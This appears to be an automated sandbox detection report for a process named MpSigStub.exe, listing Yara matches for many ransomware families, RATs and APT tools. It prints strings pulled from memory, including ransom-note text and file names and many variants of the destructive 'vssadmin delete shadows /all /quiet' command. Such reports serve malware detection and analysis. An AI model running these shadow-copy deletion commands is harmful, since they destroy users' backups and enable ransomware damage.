Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Clay Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Thanos ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected CryLock ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected OCT Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Snatch Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Silvertor Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Annabelle Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Gocoder ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp, type: MEMORY
Yara detected WannaRen ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Ryuk ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Zeoticus ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Porn Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected DarkSide Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected HiddenTear ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected WormLocker Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Mailto ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Voidcrypt Ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18323868678.0000015B1BD96000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected GoGoogle ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Axiom Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Artemon Ransomware
Source: Yara match File source: 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Covid19 Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected LokiLocker Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Cryptolocker ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1c00879a.77.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b013bb2.54.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Marvel Ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Cute Ransomware
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b013bb2.54.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected 0x0M4R Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Amnesia ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Found potential ransomware demand text
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: )Decrypting of your files is only possible
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: Decrypting of your files is only possible
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: )Decrypting of your files is only possible]
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp String found in binary or memory: Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp String found in binary or memory: Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.
Deletes shadow drive data (may be related to ransomware)
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp Binary or memory string: vssadmindeleteshadows
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /all /for=
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /all /quiet & wmic shadowcopy delete
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /all
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: /c vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: /c vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: T/c vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe vssadmin delete shadows / all / quiet
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp Binary or memory string: vssadmin Delete Shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: /C vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: /C vssadmin.exe delete shadows /all /quietx
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe delete shadows /all /Quiet
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp Binary or memory string: vssadmin.exedeleteshadows/all/quiet
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp Binary or memory string: %vssadmin.exedeleteshadows/all/quiet
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp Binary or memory string: cmd.exe /c vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp Binary or memory string: /c vssadmin.exe delete shadows /quiet /all
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: /C vssadmin Delete Shadows /Quiet /All
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /All]
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: /c vssadmin.exe delete shadows /all /quiet]
Source: MpSigStub.exe, 00000023.00000003.18293985930.0000015B1C0F1000.00000004.00000001.sdmp Binary or memory string: Nvssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp Binary or memory string: */c vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp Binary or memory string: vssadmindeleteshadows/all/quiet
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp Binary or memory string: !vssadmindeleteshadows/all/quiet
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: /c vssadmin.exe delete shadows
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: Fvssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: #vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: /c vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: /c vssadmin delete shadows /all /quiet]
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp Binary or memory string: cmd /c vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp Binary or memory string: 6vssadmin.exe delete shadows
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp Binary or memory string: 'vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /for=c: /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /for=d: /all /quiet
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp Binary or memory string: /C vssadmin delete shadows /all /quiet
Found string related to ransomware
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp Binary or memory string: &act=gettext&lang=
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp Binary or memory string: &encrypted=
Modifies the hosts file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior
May drop file containing decryption instructions (likely related to ransomware)
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp Binary or memory string: How to decrypt files.html
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp Binary or memory string: RESTORE_FILES.txt
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp Binary or memory string: HELP_instructions.html

System Summary:

barindex
Potential malicious icon found
Source: initial sample Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Malicious sample detected (through community Yara rule)
Source: 35.3.MpSigStub.exe.15b1ad30826.62.raw.unpack, type: UNPACKEDPE Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1b9c89b2.43.raw.unpack, type: UNPACKEDPE Matched rule: Detects Derusbi Kernel Driver Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1a7d1391.177.raw.unpack, type: UNPACKEDPE Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1a7cea69.179.raw.unpack, type: UNPACKEDPE Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bb541e6.101.raw.unpack, type: UNPACKEDPE Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bb541e6.101.raw.unpack, type: UNPACKEDPE Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bb541e6.101.raw.unpack, type: UNPACKEDPE Matched rule: Detects APT41 malware POISONPLUG Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bb541e6.101.raw.unpack, type: UNPACKEDPE Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1c00879a.77.unpack, type: UNPACKEDPE Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 35.3.MpSigStub.exe.15b1c00879a.77.unpack, type: UNPACKEDPE Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 35.3.MpSigStub.exe.15b1b09d292.197.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.raw.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1a7b2b8a.201.raw.unpack, type: UNPACKEDPE Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 35.3.MpSigStub.exe.15b1a7b2b8a.201.raw.unpack, type: UNPACKEDPE Matched rule: Rule to detect Duqu 2.0 samples Author: unknown
Source: 35.3.MpSigStub.exe.15b1b09d292.124.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.raw.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1b352d6a.96.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: 35.3.MpSigStub.exe.15b1c4ed472.82.raw.unpack, type: UNPACKEDPE Matched rule: Detects Pupy RAT Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1c4ed472.82.raw.unpack, type: UNPACKEDPE Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bb549ea.103.raw.unpack, type: UNPACKEDPE Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bb549ea.103.raw.unpack, type: UNPACKEDPE Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bb549ea.103.raw.unpack, type: UNPACKEDPE Matched rule: Detects APT41 malware POISONPLUG Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bb549ea.103.raw.unpack, type: UNPACKEDPE Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bcea0d6.57.raw.unpack, type: UNPACKEDPE Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 35.3.MpSigStub.exe.15b1bcea0d6.51.raw.unpack, type: UNPACKEDPE Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 35.3.MpSigStub.exe.15b1b9ca5ba.42.raw.unpack, type: UNPACKEDPE Matched rule: Detects Derusbi Kernel Driver Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1c47d182.111.raw.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1aab7177.152.unpack, type: UNPACKEDPE Matched rule: korlia Author: Nick Hoffman
Source: 35.3.MpSigStub.exe.15b1b013bb2.54.unpack, type: UNPACKEDPE Matched rule: Detects destructive malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1a7b1586.200.raw.unpack, type: UNPACKEDPE Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 35.3.MpSigStub.exe.15b1a7b1586.200.raw.unpack, type: UNPACKEDPE Matched rule: Rule to detect Duqu 2.0 samples Author: unknown
Source: 35.3.MpSigStub.exe.15b1ad1f44c.63.raw.unpack, type: UNPACKEDPE Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1b9c97b6.41.raw.unpack, type: UNPACKEDPE Matched rule: Detects Derusbi Kernel Driver Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 35.3.MpSigStub.exe.15b1a7cfabd.178.raw.unpack, type: UNPACKEDPE Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1af1836e.68.unpack, type: UNPACKEDPE Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 35.3.MpSigStub.exe.15b1bcea0d6.215.raw.unpack, type: UNPACKEDPE Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 35.3.MpSigStub.exe.15b1c47e986.110.raw.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1b2d20ac.231.raw.unpack, type: UNPACKEDPE Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1abe8b36.144.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 35.3.MpSigStub.exe.15b1aab4af5.151.unpack, type: UNPACKEDPE Matched rule: korlia Author: Nick Hoffman
Source: 35.3.MpSigStub.exe.15b1b354b6e.95.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: 35.3.MpSigStub.exe.15b1bb551ee.102.raw.unpack, type: UNPACKEDPE Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bb551ee.102.raw.unpack, type: UNPACKEDPE Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bb551ee.102.raw.unpack, type: UNPACKEDPE Matched rule: Detects APT41 malware POISONPLUG Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bb551ee.102.raw.unpack, type: UNPACKEDPE Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1b4cce16.210.unpack, type: UNPACKEDPE Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 35.3.MpSigStub.exe.15b1b4cce16.210.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1b887722.80.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1b887722.80.unpack, type: UNPACKEDPE Matched rule: Detects ISMDoor Backdoor Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1b4cce16.61.unpack, type: UNPACKEDPE Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 35.3.MpSigStub.exe.15b1b4cce16.61.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1b4cce16.92.unpack, type: UNPACKEDPE Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 35.3.MpSigStub.exe.15b1b4cce16.92.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: Detects ROKRAT malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: Webshells Auto-generated - file vanquish.exe Author: Yara Bulk Rule Generator by Florian Roth
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: gh0st Author: https://github.com/jackcr/
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Detects Pupy RAT Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Detects Arid Viper malware sample Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Detects ROKRAT malware Author: Florian Roth
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Webshells Auto-generated - file vanquish.exe Author: Yara Bulk Rule Generator by Florian Roth
